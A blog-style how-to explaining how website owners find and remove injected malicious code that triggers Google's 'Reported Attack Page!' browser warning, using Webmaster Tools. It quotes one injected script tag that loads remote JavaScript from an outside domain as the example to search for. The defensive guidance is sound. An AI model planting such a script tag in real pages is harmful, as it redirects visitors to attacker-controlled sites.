How to Fix Message: Reported Attack Page! From Google

If you ever come across this message while accessing your site.
pctech_blocked
It means that google has detected some malicious code in your site, and you’re probably using either Firefox or Chrome, which use data from Google’s SafeBrowsing to identify fishing and malware pages. Because the browser (firefox/chrome) get data from google is that you see that page with message “Reported Attacked Page!” In any case here are some steps you could take to remove the malicious code from your site, and finally prevent this page from displaying.

1- Since it is Google the one who detected the malware on your site, your best bet is to see what they found. The way you do that is by logging in to your Google account, and going to Webmaster Tools.

2- Once you’re logged in, click on your site name, and then click on “Security Issues.” Here you will find a detail report of what Google found on your site. Also, there’s a list of pages that were infected.
screenshot-screen-2014-05-17-170415

3- Click the “Show Details” to actually see what Google found as malware or malicious code. Here’s an example of the code that was injected on the site. the code was redirecting user to a different site.
code_details

As you can see in the section “Suspicious Snippet” there is a javascript code pointing to another website.

<script src="demodomain.cz/rvy4lxwk.php?id=89574397" type="text/javascript">// <![CDATA[ // ]]></script>

So now we have something to search in our pages. The way you go about finding the code it may vary depending on the platform. For this example, I’m assuming you’re using WordPress. However, you could use this method for any platform.

4- Removing Malware: Login to your host provider or hosting account, and open any of the infected pages in an editor. Once you’ve opened the page use the find/search feature to search for some part of the malicious code. For example, from the malicious code above you could enter “demodomain.cz” or “89574397” as a search pattern in order to identify where the malicious code is. Chances are that the attacker inserted the malicious code in the same segment in several pages. If you find that the malicious code has been inserted in the header of your page, there’s a pretty good chance that’s where you’ll find it in the rest of the pages that were infected. (Remove all malicious code).

5- Request a Review: Once you have removed the code from the pages, you will have to submit a “Request a Review” which is the red button in the “Security Issues” page. Click on the button and fill in the steps you took to remove the malware.
screenshot-screen-2014-05-17-173744

If you were successful in removing all malware, your site should be up in less than 24 hours.

Share This!

Leave a Reply

Your email address will not be published.